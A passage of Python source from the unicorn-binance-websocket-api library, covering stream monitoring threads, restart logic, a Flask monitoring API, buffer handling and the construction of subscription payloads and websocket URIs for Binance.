f" for further information!")
self.stop_manager_with_all_streams()
sys.exit(1)
logging.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f"error: 7 - {str(error_msg)} - if this stream did not restart after this error, please "
f"create an issue: "
f"https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/new/choose")
loop.close()
finally:
self.add_to_stream_signal_buffer("DISCONNECT", stream_id)
loop.close()
def _frequent_checks(self):
    """
    This method gets started as a thread and is doing the frequent checks

    Runs roughly three times per second (``time.sleep(0.3)``) until the manager or this worker
    instance receives a stop request. Each iteration: refreshes this worker's heartbeat, watches
    CPU usage, updates per-stream and global `most_receives_per_second` statistics, prunes
    statistic entries older than `keep_max_received_last_second_entries`, tracks the global
    receiving speed peak and sends listen_key keepalive pings for `!userData` streams.
    """
    # register this worker instance so the manager can monitor and stop it
    frequent_checks_id = time.time()
    # start timestamp of a sustained high-CPU phase, or False while CPU is below the threshold
    cpu_usage_time = False
    with self.frequent_checks_list_lock:
        self.frequent_checks_list[frequent_checks_id] = {'last_heartbeat': 0,
                                                         'stop_request': None,
                                                         'has_stopped': False}
    logging.info("BinanceWebSocketApiManager._frequent_checks() new instance created with frequent_checks_id=" +
                 str(frequent_checks_id))
    # threaded loop for min 1 check per second
    while self.stop_manager_request is None and self.frequent_checks_list[frequent_checks_id]['stop_request'] \
            is None:
        with self.frequent_checks_list_lock:
            self.frequent_checks_list[frequent_checks_id]['last_heartbeat'] = time.time()
        time.sleep(0.3)
        current_timestamp = int(time.time())
        last_timestamp = current_timestamp - 1
        next_to_last_timestamp = current_timestamp - 2
        total_most_stream_receives_last_timestamp = 0
        total_most_stream_receives_next_to_last_timestamp = 0
        active_stream_list = self.get_active_stream_list()
        # check CPU stats - warn once if usage stays >= 95% for longer than `time_of_waiting` seconds
        cpu = self.get_process_usage_cpu()
        if cpu >= 95:
            time_of_waiting = 5
            if cpu_usage_time is False:
                cpu_usage_time = time.time()
            elif (time.time() - cpu_usage_time) > time_of_waiting:
                logging.warning(f"BinanceWebSocketApiManager._frequent_checks() - High CPU usage since "
                                f"{str(time_of_waiting)} seconds: {str(cpu)}")
                cpu_usage_time = False
        else:
            cpu_usage_time = False
        # count most_receives_per_second total last second
        if active_stream_list:
            for stream_id in active_stream_list:
                # set the streams `most_receives_per_second` value
                try:
                    if self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp] > \
                            self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second']:
                        self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second'] = \
                            self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp]
                except KeyError:
                    # no receive entry recorded for that second
                    pass
                try:
                    total_most_stream_receives_last_timestamp += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp]
                except KeyError:
                    pass
                try:
                    total_most_stream_receives_next_to_last_timestamp += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][next_to_last_timestamp]
                except KeyError:
                    pass
                # delete list entries older than `keep_max_received_last_second_entries`
                # receives_statistic_last_second
                delete_index = []
                if len(self.stream_list[stream_id]['receives_statistic_last_second']['entries']) > \
                        self.keep_max_received_last_second_entries:
                    # deepcopy under the lock so receiving threads can not mutate the dict mid-scan
                    with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
                        temp_entries = copy.deepcopy(self.stream_list[stream_id]['receives_statistic_last_second']['entries'])
                    for timestamp_key in temp_entries:
                        try:
                            if timestamp_key < current_timestamp - self.keep_max_received_last_second_entries:
                                delete_index.append(timestamp_key)
                        except ValueError as error_msg:
                            logging.error(
                                "BinanceWebSocketApiManager._frequent_checks() timestamp_key=" + str(timestamp_key) +
                                " current_timestamp=" + str(current_timestamp) + " keep_max_received_last_second_"
                                "entries=" + str(self.keep_max_received_last_second_entries) + " error_msg=" +
                                str(error_msg))
                for timestamp_key in delete_index:
                    with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
                        self.stream_list[stream_id]['receives_statistic_last_second']['entries'].pop(timestamp_key,
                                                                                                    None)
                # transfer_rate_per_second
                delete_index = []
                if len(self.stream_list[stream_id]['transfer_rate_per_second']['bytes']) > \
                        self.keep_max_received_last_second_entries:
                    try:
                        # NOTE(review): unlike the block above this iterates the live dict (no deepcopy,
                        # no lock); the RuntimeError handler below catches "changed size during iteration"
                        temp_bytes = self.stream_list[stream_id]['transfer_rate_per_second']['bytes']
                        for timestamp_key in temp_bytes:
                            try:
                                if timestamp_key < current_timestamp - self.keep_max_received_last_second_entries:
                                    delete_index.append(timestamp_key)
                            except ValueError as error_msg:
                                logging.error(
                                    "BinanceWebSocketApiManager._frequent_checks() timestamp_key="
                                    + str(timestamp_key) +
                                    " current_timestamp=" + str(current_timestamp) +
                                    " keep_max_received_last_second_"
                                    "entries=" + str(self.keep_max_received_last_second_entries) + " error_msg=" +
                                    str(error_msg))
                    except RuntimeError as error_msg:
                        logging.info("BinanceWebSocketApiManager._frequent_checks() - "
                                     "Catched RuntimeError: " + str(error_msg))
                for timestamp_key in delete_index:
                    self.stream_list[stream_id]['transfer_rate_per_second']['bytes'].pop(timestamp_key, None)
        # set most_receives_per_second
        try:
            if int(self.most_receives_per_second) < int(total_most_stream_receives_last_timestamp):
                self.most_receives_per_second = int(total_most_stream_receives_last_timestamp)
        except ValueError as error_msg:
            logging.error("BinanceWebSocketApiManager._frequent_checks() self.most_receives_per_second"
                          "=" + str(self.most_receives_per_second) + " total_most_stream_receives_last_timestamp"
                          "=" + str(total_most_stream_receives_last_timestamp) + " total_most_stream_receives_next_"
                          "to_last_timestamp=" + str(total_most_stream_receives_next_to_last_timestamp) + " error_"
                          "msg=" + str(error_msg))
        # check receiving_speed_peak
        last_second_receiving_speed = self.get_current_receiving_speed_global()
        try:
            if last_second_receiving_speed > self.receiving_speed_peak['value']:
                self.receiving_speed_peak['value'] = last_second_receiving_speed
                self.receiving_speed_peak['timestamp'] = time.time()
                logging.info(f"BinanceWebSocketApiManager._frequent_checks() - reached new "
                             f"`highest_receiving_speed` "
                             f"{str(self.get_human_bytesize(self.receiving_speed_peak['value'], '/s'))} at "
                             f"{self.get_date_of_timestamp(self.receiving_speed_peak['timestamp'])}")
        except TypeError as error_msg:
            # receiving speed or peak value not comparable (e.g. not initialized yet)
            pass
        # send keepalive for `!userData` streams every 30 minutes
        if active_stream_list:
            for stream_id in active_stream_list:
                # normalize markets/channels to lists for the membership tests below
                if isinstance(active_stream_list[stream_id]['markets'], str):
                    active_stream_list[stream_id]['markets'] = [active_stream_list[stream_id]['markets'], ]
                if isinstance(active_stream_list[stream_id]['channels'], str):
                    active_stream_list[stream_id]['channels'] = [active_stream_list[stream_id]['channels'], ]
                if "!userData" in active_stream_list[stream_id]['markets'] or \
                        "!userData" in active_stream_list[stream_id]['channels']:
                    # ping only when both the start time and the last ping are older than the cache time
                    if (active_stream_list[stream_id]['start_time'] + active_stream_list[stream_id]['listen_key_cache_time']) \
                            < time.time() and (active_stream_list[stream_id]['last_static_ping_listen_key'] +
                                               active_stream_list[stream_id]['listen_key_cache_time']) < time.time():
                        # keep-alive the listenKey
                        self.restclient.keepalive_listen_key(stream_id)
                        # set last_static_ping_listen_key
                        self.stream_list[stream_id]['last_static_ping_listen_key'] = time.time()
                        self.set_heartbeat(stream_id)
                        logging.info("BinanceWebSocketApiManager._frequent_checks() - sent listen_key keepalive "
                                     "ping for stream_id=" + str(stream_id))
    # terminate this worker thread once a stop was requested
    sys.exit(0)
def _keepalive_streams(self):
    """
    This method is started as a thread and is observing the streams, if necessary it restarts a dead stream

    Checks once per second for restart requests (and kill requests) and spawns a
    `_restart_stream_thread` for each affected stream until the manager or this worker
    instance receives a stop request.
    """
    # register this worker instance so the manager can monitor and stop it
    keepalive_streams_id = time.time()
    self.keepalive_streams_list[keepalive_streams_id] = {'last_heartbeat': 0,
                                                         'stop_request': None,
                                                         'has_stopped': False}
    logging.info(
        "BinanceWebSocketApiManager._keepalive_streams() new instance created with keepalive_streams_id=" +
        str(keepalive_streams_id))
    # threaded loop to restart crashed streams:
    while self.stop_manager_request is None and \
            self.keepalive_streams_list[keepalive_streams_id]['stop_request'] is None:
        time.sleep(1)
        self.keepalive_streams_list[keepalive_streams_id]['last_heartbeat'] = time.time()
        # restart streams with a restart_request (status == new)
        # iterate over a deepcopy: other threads may mutate `restart_requests` concurrently
        temp_restart_requests = copy.deepcopy(self.restart_requests)
        for stream_id in temp_restart_requests:
            try:
                # find restarts that didnt work: re-arm the request after `restart_timeout` elapsed
                if self.restart_requests[stream_id]['status'] == "restarted" and \
                        self.restart_requests[stream_id]['last_restart_time']+self.restart_timeout < time.time():
                    self.restart_requests[stream_id]['status'] = "new"
                # restart streams with requests
                if self.restart_requests[stream_id]['status'] == "new" or \
                        self.stream_list[stream_id]['kill_request'] is True:
                    self.kill_stream(stream_id)
                    thread = threading.Thread(target=self._restart_stream_thread, args=(stream_id,))
                    thread.start()
            except KeyError:
                # request or stream entry vanished between the deepcopy and this access
                pass
    # terminate this worker thread once a stop was requested
    sys.exit(0)
def _restart_stream(self, stream_id):
    """
    Start a died stream again.

    This is NOT stop/start! Its purpose is to start a died stream again! Use `set_restart_request()` for stop/start!

    Requires an existing restart_request entry with status "new" for the given `stream_id`
    (created via `set_restart_request()`), otherwise the call is refused.

    :param stream_id: id of a stream
    :type stream_id: uuid
    :return: stream_id or False
    """
    try:
        if self.restart_requests[stream_id]['status'] != "new":
            logging.warning("BinanceWebSocketApiManager._restart_stream() please use `set_restart_request()` "
                            "instead!")
            return False
    except KeyError:
        # no restart_request entry for this stream_id:
        logging.warning("BinanceWebSocketApiManager._restart_stream() please use `set_restart_request() instead!")
        return False
    logging.info("BinanceWebSocketApiManager._restart_stream(" + str(stream_id) + ", " +
                 str(self.stream_list[stream_id]['channels']) +
                 ", " + str(self.stream_list[stream_id]['markets']) + ")")
    # mark the request as handled and reset the stream's runtime state
    self.restart_requests[stream_id] = {'status': "restarted"}
    self.restart_requests[stream_id]['last_restart_time'] = time.time()
    self.stream_list[stream_id]['status'] = "restarting"
    self.stream_list[stream_id]['kill_request'] = None
    self.stream_list[stream_id]['payload'] = []
    try:
        loop = asyncio.new_event_loop()
    except OSError as error_msg:
        # fix: this log message wrongly referenced `create_stream()` before
        logging.critical(f"BinanceWebSocketApiManager._restart_stream({str(stream_id)}) - OSError - "
                         f"error_msg: {str(error_msg)}")
        return False
    # the restarted websocket runs in its own thread with its own asyncio event loop;
    # `True` marks this invocation as a restart (keeps the existing stream_buffer)
    thread = threading.Thread(target=self._create_stream_thread,
                              args=(loop,
                                    stream_id,
                                    self.stream_list[stream_id]['channels'],
                                    self.stream_list[stream_id]['markets'],
                                    self.stream_list[stream_id]['stream_buffer_name'],
                                    True))
    thread.start()
    return stream_id
def _restart_stream_thread(self, stream_id):
    """
    Thread target that triggers the restart of a died stream via `_restart_stream()`.

    :param stream_id: id of a stream
    :type stream_id: uuid
    """
    # delegate the whole restart logic to `_restart_stream()`
    self._restart_stream(stream_id)
def _start_monitoring_api_thread(self, host, port, warn_on_update):
    """
    Threaded method that serves the monitoring api

    :param host: IP or hostname to use
    :type host: str
    :param port: Port to use
    :type port: int
    :param warn_on_update: Should the monitoring system report available updates?
    :type warn_on_update: bool
    """
    logging.info("BinanceWebSocketApiManager._start_monitoring_api_thread() - Starting monitoring API service ...")
    app = Flask(__name__)

    # '/' and '/status/' redirect visitors to the documentation of the monitoring service
    @app.route('/')
    @app.route('/status/')
    def redirect_to_wiki():
        logging.info("BinanceWebSocketApiManager._start_monitoring_api_thread() 200 - "
                     "Visit https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/UNICORN-"
                     "Monitoring-API-Service for further information!")
        return redirect("https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/"
                        "UNICORN-Monitoring-API-Service", code=302)

    # REST endpoints: /status/<format>/ and /status/<format>/<checkcommandversion>
    api = Api(app)
    api.add_resource(BinanceWebSocketApiRestServer,
                     "/status/<string:statusformat>/",
                     "/status/<string:statusformat>/<string:checkcommandversion>",
                     resource_class_kwargs={'handler_binance_websocket_api_manager': self,
                                            'warn_on_update': warn_on_update})
    try:
        # serve the Flask app via the imported `wsgi` server (blocking start) —
        # presumably cheroot/cherrypy; confirm against the file's imports
        dispatcher = wsgi.PathInfoDispatcher({'/': app})
        self.monitoring_api_server = wsgi.WSGIServer((host, port), dispatcher)
        self.monitoring_api_server.start()
    except RuntimeError as error_msg:
        logging.critical("BinanceWebSocketApiManager._start_monitoring_api_thread() - Monitoring API service is "
                         "going down! - Info: " + str(error_msg))
    except OSError as error_msg:
        # e.g. port already in use
        logging.critical("BinanceWebSocketApiManager._start_monitoring_api_thread() - Monitoring API service is "
                         "going down! - Info: " + str(error_msg))
def add_to_ringbuffer_error(self, error):
    """
    Append an error message received from a websocket endpoint to the error ringbuffer.

    Oldest entries are discarded until the buffer is below its configured maximum size.

    :param error: The data to add.
    :type error: string
    :return: bool
    """
    ring = self.ringbuffer_error
    # drop oldest entries until there is room for the new one
    while len(ring) >= self.get_ringbuffer_error_max_size():
        ring.pop(0)
    ring.append(str(error))
    return True
def add_to_ringbuffer_result(self, result):
    """
    Append a result message received from a websocket endpoint to the result ringbuffer.

    Oldest entries are discarded until the buffer is below its configured maximum size.

    :param result: The data to add.
    :type result: string
    :return: bool
    """
    ring = self.ringbuffer_result
    # drop oldest entries until there is room for the new one
    while len(ring) >= self.get_ringbuffer_result_max_size():
        ring.pop(0)
    ring.append(str(result))
    return True
def add_to_stream_buffer(self, stream_data, stream_buffer_name=False):
    """
    Kick back data to the
    `stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_

    If received stream data can not be processed right now (for example the database is
    restarting), it can be written back into the stream_buffer. A few seconds after writing
    back stops, the BinanceWebSocketApiManager flushes the data back to normal processing.

    :param stream_data: the data you want to write back to the buffer
    :type stream_data: raw stream_data or unicorn_fied stream data
    :param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
                               set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
                               provide a string to create and use a shared stream_buffer and read it via
                               `pop_stream_data_from_stream_buffer('string')`.
    :type stream_buffer_name: bool or str
    :return: bool
    """
    # select the target buffer and its lock: a named/shared one or the default buffer
    if stream_buffer_name is not False:
        buffer_lock = self.stream_buffer_locks[stream_buffer_name]
        target_buffer = self.stream_buffers[stream_buffer_name]
    else:
        buffer_lock = self.stream_buffer_lock
        target_buffer = self.stream_buffer
    with buffer_lock:
        target_buffer.append(stream_data)
    self.last_entry_added_to_stream_buffer = time.time()
    return True
def add_to_stream_signal_buffer(self, signal_type=False, stream_id=False, data_record=False):
    """
    Add signals about a stream to the
    `stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_

    :param signal_type: "CONNECT", "DISCONNECT" or "FIRST_RECEIVED_DATA"
    :type signal_type: str
    :param stream_id: id of a stream
    :type stream_id: uuid
    :param data_record: The last or first received data record
    :type data_record: str or dict
    :return: bool
    """
    if not self.enable_stream_signal_buffer:
        # signal buffering is disabled
        return False
    stream_signal = {'type': signal_type,
                     'stream_id': stream_id,
                     'timestamp': time.time()}
    if signal_type == "DISCONNECT":
        # attach the last data record seen before the disconnect
        try:
            stream_signal['last_received_data_record'] = self.stream_list[stream_id]['last_received_data_record']
        except KeyError as error_msg:
            logging.critical(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({signal_type}) - "
                             f"Cant determine last_received_data_record! - error_msg: {error_msg}")
            stream_signal['last_received_data_record'] = None
    elif signal_type == "FIRST_RECEIVED_DATA":
        stream_signal['first_received_data_record'] = data_record
    elif signal_type != "CONNECT":
        # "CONNECT" needs no extra payload; anything else is invalid
        logging.error(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({signal_type}) - "
                      f"Received invalid `signal_type`!")
        return False
    with self.stream_signal_buffer_lock:
        self.stream_signal_buffer.append(stream_signal)
    logging.info(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({stream_signal})")
    return True
def add_total_received_bytes(self, size):
    """
    Add received bytes to the total received bytes statistic.

    :param size: int value of added bytes
    :type size: int
    """
    received = int(size)
    # guard the counter: it is updated from multiple receiving threads
    with self.total_received_bytes_lock:
        self.total_received_bytes += received
def create_payload(self, stream_id, method, channels=False, markets=False):
    """
    Create the payload for subscriptions

    :param stream_id: provide a stream_id
    :type stream_id: uuid
    :param method: `subscribe` or `unsubscribe`
    :type method: str
    :param channels: provide the channels to create the URI
    :type channels: str, tuple, list, set
    :param markets: provide the markets to create the URI
    :type markets: str, tuple, list, set
    :return: payload (list) or False
    """
    logging.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", " + str(channels) + ", " +
                 str(markets) + ") started ...")
    if type(channels) is str:
        channels = [channels]
    if type(markets) is str:
        markets = [markets]
    payload = []
    if self.is_exchange_type("dex"):
        if method == "subscribe" and channels is not False:
            for channel in channels:
                add_payload = {"method": method,
                               "topic": channel}
                symbols = []
                # broadcast channels subscribe to all symbols
                if channel == "allMiniTickers" or \
                        channel == "allTickers" or \
                        channel == "blockheight":
                    add_payload["symbols"] = ["$all"]
                    payload.append(add_payload)
                    continue
                if markets:
                    for market in markets:
                        if market == "allMiniTickers" or \
                                market == "allTickers" or \
                                market == "blockheight":
                            add_payload_from_market = {"method": method,
                                                       "topic": market,
                                                       "symbols": ["$all"]}
                            payload.append(add_payload_from_market)
                            continue
                        elif re.match(r'[a-zA-Z0-9]{41,43}', market) is not None:
                            # a 41-43 char alnum market is treated as the DEX wallet address
                            if self.stream_list[stream_id]['dex_user_address'] is False:
                                self.stream_list[stream_id]['dex_user_address'] = market
                        else:
                            symbols.append(market)
                try:
                    if self.stream_list[stream_id]["dex_user_address"] is not False:
                        add_payload["address"] = self.stream_list[stream_id]["dex_user_address"]
                        payload.append(add_payload)
                except KeyError:
                    pass
                if len(symbols) > 0:
                    add_payload["symbols"] = symbols
                    payload.append(add_payload)
        elif method == "unsubscribe":
            if markets:
                add_payload = {"method": method}
                # fix: iterate over a copy - the loop removes address entries from `markets`,
                # and removing from the list being iterated skips the following element
                for market in list(markets):
                    if re.match(r'[a-zA-Z0-9]{41,43}', market) is not None:
                        if self.stream_list[stream_id]['dex_user_address'] is False:
                            self.stream_list[stream_id]['dex_user_address'] = market
                        markets.remove(market)
                if len(markets) > 0:
                    add_payload["symbols"] = markets
                    payload.append(add_payload)
            if channels:
                for channel in channels:
                    add_payload = {"method": method,
                                   "topic": channel}
                    payload.append(add_payload)
        else:
            logging.critical("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
                             + str(channels) + ", " + str(markets) + ") - Allowed values for `method`: `subscribe` "
                             "or `unsubscribe`!")
            return False
    elif self.is_exchange_type("cex"):
        # determine the suffix for broadcast ("!...") entries: default "@arr",
        # or e.g. "@arr@3000ms" if an "arr@..." variant was provided
        final_market = "@arr"
        if markets:
            for market in markets:
                if "arr@" in market:
                    final_market = "@" + market
        final_channel = "@arr"
        if channels:
            for channel in channels:
                if "arr@" in channel:
                    final_channel = "@" + channel
        if method == "subscribe":
            params = []
            for channel in channels:
                if "!" in channel:
                    params.append(channel + final_market)
                    continue
                else:
                    for market in markets:
                        if "!" in market:
                            params.append(market + final_channel)
                        else:
                            params.append(market.lower() + "@" + channel)
            if len(params) > 0:
                # de-duplicate before splitting into max-sized payload chunks
                params = list(set(params))
                payload = self.split_payload(params, "SUBSCRIBE")
        elif method == "unsubscribe":
            if markets:
                params = []
                try:
                    for channel in self.stream_list[stream_id]['channels']:
                        if "!" in channel:
                            params.append(channel + final_market)
                        else:
                            for market in markets:
                                params.append(market.lower() + "@" + channel)
                    if len(params) > 0:
                        payload = self.split_payload(params, "UNSUBSCRIBE")
                except KeyError:
                    pass
            if channels:
                params = []
                for market in self.stream_list[stream_id]['markets']:
                    if "!" in market:
                        params.append(market + final_channel)
                    else:
                        for channel in channels:
                            params.append(market.lower() + "@" + channel)
                if len(params) > 0:
                    payload = self.split_payload(params, "UNSUBSCRIBE")
        else:
            logging.critical("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
                             + str(channels) + ", " + str(markets) + ") - Allowed values for `method`: `subscribe` "
                             "or `unsubscribe`!")
            return False
    logging.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
                 + str(channels) + ", " + str(markets) + ") - Payload: " + str(payload))
    logging.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", " + str(channels) + ", " +
                 str(markets) + ") finished ...")
    return payload
def create_stream(self,
                  channels,
                  markets, stream_label=None,
                  stream_buffer_name=False,
                  api_key=False,
                  api_secret=False,
                  symbols=False,
                  output=False,
                  ping_interval=20,
                  ping_timeout=20,
                  close_timeout=10):
    """
    Create a websocket stream

    If you provide 2 markets and 2 channels, then you are going to create 4 subscriptions (markets * channels).

    Example:

        channels = ['trade', 'kline_1']

        markets = ['bnbbtc', 'ethbtc']

        Finally: bnbbtc@trade, ethbtc@trade, bnbbtc@kline_1, ethbtc@kline_1

    `There is a limit of 1024 subscriptions per stream.
    <https://github.com/binance-exchange/binance-official-api-docs/blob/5fccfd572db2f530e25e302c02be5dec12759cf9/CHANGELOG.md#2020-04-23>`_

    Create `!userData` streams as single streams, because its using a different endpoint and can not get combined
    with other streams in a multiplexed stream!

    Example CEX:

        ``binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bbb")``

    Isolated Margin:

        ``binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bbb", symbols="ankrbtc")``

    Example DEX:

        ``binance_websocket_api_manager.create_stream(['orders', 'transfers', 'accounts'], binance_dex_user_address)``

    To create a multiplexed stream which includes also `!miniTicker@arr`, `!ticker@arr`, `!forceOrder@arr` or
    `!bookTicker@arr` you just need to add `!bookTicker` to the channels list - dont add `arr` (cex) or `$all`
    (dex) to the markets list.

    Example:

        ``binance_websocket_api_manager.create_stream(['kline_5m', 'marketDepth', '!miniTicker'], ['bnbbtc'])``

    But you have to add `arr` or `$all` if you want to start it as a single stream!

    Example:

        ``binance_websocket_api_manager.create_stream(["arr"], ["!miniTicker"])``

    :param channels: provide the channels you wish to stream
    :type channels: str, tuple, list, set
    :param markets: provide the markets you wish to stream
    :type markets: str, tuple, list, set
    :param stream_label: provide a stream_label to identify the stream
    :type stream_label: str
    :param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
                               set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
                               provide a string to create and use a shared stream_buffer and read it via
                               `pop_stream_data_from_stream_buffer('string')`.
    :type stream_buffer_name: bool or str
    :param api_key: provide a valid Binance API key
    :type api_key: str
    :param api_secret: provide a valid Binance API secret
    :type api_secret: str
    :param symbols: provide the symbols for isolated_margin user_data streams
    :type symbols: str
    :param output: the default setting `raw_data` can be globaly overwritten with the parameter
                   `output_default <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html?highlight=output_default#module-unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager>`_
                   of BinanceWebSocketApiManager`. To overrule the `output_default` value for this specific stream,
                   set `output` to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
                   convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise with
                   the default setting "raw_data" the output remains unchanged and gets delivered as received from
                   the endpoints
    :type output: str
    :param ping_interval: Once the connection is open, a `Ping frame` is sent every
                          `ping_interval` seconds. This serves as a keepalive. It helps keeping
                          the connection open, especially in the presence of proxies with short
                          timeouts on inactive connections. Set `ping_interval` to `None` to
                          disable this behavior. (default: 20)
                          This parameter is passed through to the `websockets.client.connect()
                          <https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
    :type ping_interval: int or None
    :param ping_timeout: If the corresponding `Pong frame` isn't received within
                         `ping_timeout` seconds, the connection is considered unusable and is closed with
                         code 1011. This ensures that the remote endpoint remains responsive. Set
                         `ping_timeout` to `None` to disable this behavior. (default: 20)
                         This parameter is passed through to the `websockets.client.connect()
                         <https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
    :type ping_timeout: int or None
    :param close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
                          completing the closing handshake and terminating the TCP connection. (default: 10)
                          This parameter is passed through to the `websockets.client.connect()
                          <https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
    :type close_timeout: int or None
    :return: stream_id or 'False'
    """
    # create a stream
    # reject bools explicitly - `True`/`False` would otherwise be silently iterated/stringified
    if isinstance(channels, bool):
        logging.error(f"BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets) + ", "
                      + str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ") - Parameter "
                      f"`channels` must be str, tuple, list or a set!")
        return False
    elif isinstance(markets, bool):
        logging.error(f"BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets) + ", "
                      + str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ") - Parameter "
                      f"`markets` must be str, tuple, list or a set!")
        return False
    if type(channels) is str:
        channels = [channels]
    if type(markets) is str:
        markets = [markets]
    if output is False:
        output = self.output_default
    stream_id = uuid.uuid4()
    markets_new = []
    if stream_buffer_name is True:
        # `True` means: use a dedicated stream_buffer keyed by the new stream_id
        stream_buffer_name = stream_id
    for market in markets:
        # pass through broadcast-style markets unchanged
        if "!" in market \
                or market == "allMiniTickers" \
                or market == "allTickers" \
                or market == "blockheight" \
                or market == "$all":
            markets_new.append(market)
        else:
            if self.is_exchange_type('dex'):
                # DEX symbols get upper-cased; 41-43 char alnum values (wallet addresses) keep their case
                if re.match(r'[a-zA-Z0-9]{41,43}', market) is None:
                    markets_new.append(str(market).upper())
                else:
                    markets_new.append(str(market))
            elif self.is_exchange_type('cex'):
                markets_new.append(str(market).lower())
    logging.info("BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets_new) + ", "
                 + str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ") with stream_id="
                 + str(stream_id))
    # register the stream's bookkeeping entry before starting the websocket thread
    self._add_stream_to_stream_list(stream_id,
                                    channels,
                                    markets_new,
                                    stream_label,
                                    stream_buffer_name,
                                    symbols=symbols,
                                    api_key=api_key,
                                    api_secret=api_secret,
                                    output=output,
                                    ping_interval=ping_interval,
                                    ping_timeout=ping_timeout,
                                    close_timeout=close_timeout)
    try:
        loop = asyncio.new_event_loop()
    except OSError as error_msg:
        logging.critical(f"BinanceWebSocketApiManager.create_stream({str(channels)}, {str(markets_new)}, "
                         f"{str(stream_label)}, {str(stream_buffer_name)}, {str(symbols)}) with stream_id="
                         f"{str(stream_id)} - OSError - can not create stream - error_msg: {str(error_msg)}")
        return False
    # the websocket runs in its own thread with its own asyncio event loop;
    # `False` marks this as an initial start (not a restart)
    thread = threading.Thread(target=self._create_stream_thread, args=(loop,
                                                                       stream_id,
                                                                       channels,
                                                                       markets_new,
                                                                       stream_buffer_name,
                                                                       False))
    thread.start()
    return stream_id
def create_websocket_uri(self, channels, markets, stream_id=False, api_key=False, api_secret=False, symbols=False):
    """
    Create a websocket URI

    :param channels: provide the channels to create the URI
    :type channels: str, tuple, list, set
    :param markets: provide the markets to create the URI
    :type markets: str, tuple, list, set
    :param stream_id: provide a stream_id (only needed for userData Streams (acquiring a listenKey)
    :type stream_id: uuid
    :param api_key: provide a valid Binance API key
    :type api_key: str
    :param api_secret: provide a valid Binance API secret
    :type api_secret: str
    :param symbols: provide the symbols for isolated_margin user_data streams
    :type symbols: str
    :return: str or False
    """
    # reject bools explicitly - `True`/`False` would otherwise be silently iterated/stringified
    if isinstance(channels, bool):
        logging.error(f"BinanceWebSocketApiManager.create_websocket_uri({str(channels)}, {str(markets)}"
                      f", {str(symbols)}) - error_msg: Parameter `channels` must be str, tuple, list "
                      f"or a set!")
        return False
    elif isinstance(markets, bool):
        logging.error(f"BinanceWebSocketApiManager.create_websocket_uri({str(channels)}, {str(markets)}"
                      f", {str(symbols)}) - error_msg: Parameter `markets` must be str, tuple, list "
                      f"or a set!")
        return False
    payload = []
    if type(channels) is str:
        channels = [channels]
    if type(markets) is str:
        markets = [markets]
    # single-subscription streams get dedicated "ws/..." endpoints
    if len(channels) == 1 and len(markets) == 1:
        if "!userData" in channels or "!userData" in markets:
            if stream_id is not False:
                # a !userData stream needs a listenKey acquired via the REST API
                response = self.get_listen_key_from_restclient(stream_id, api_key, api_secret, symbols=symbols)
                try:
                    if response['code'] == -1102 or \
                            response['code'] == -2008 or \
                            response['code'] == -2014 or \
                            response['code'] == -2015 or \
                            response['code'] == -11001:
                        # -1102 = Mandatory parameter 'symbol' was not sent, was empty/null, or malformed.
                        # -2008 = Invalid Api-Key ID
                        # -2014 = API-key format invalid
                        # -2015 = Invalid API-key, IP, or permissions for action
                        # -11001 = Isolated margin account does not exist.
                        # NOTE(review): the log messages below contain a doubled `", " + ", "` -
                        # looks like a typo in the message text; left unchanged here
                        logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
                                         ", " + str(markets) + ", " + ", " + str(symbols) + ") - Received known "
                                         "error code from rest client: " + str(response))
                        return response
                    else:
                        logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
                                         ", " + str(markets) + ", " + ", " + str(symbols) + ") - Received unknown "
                                         "error code from rest client: " + str(response))
                        return response
                except KeyError:
                    # no 'code' key -> response is not an error object
                    pass
                except TypeError:
                    # response is not subscriptable (e.g. False)
                    pass
                if response:
                    try:
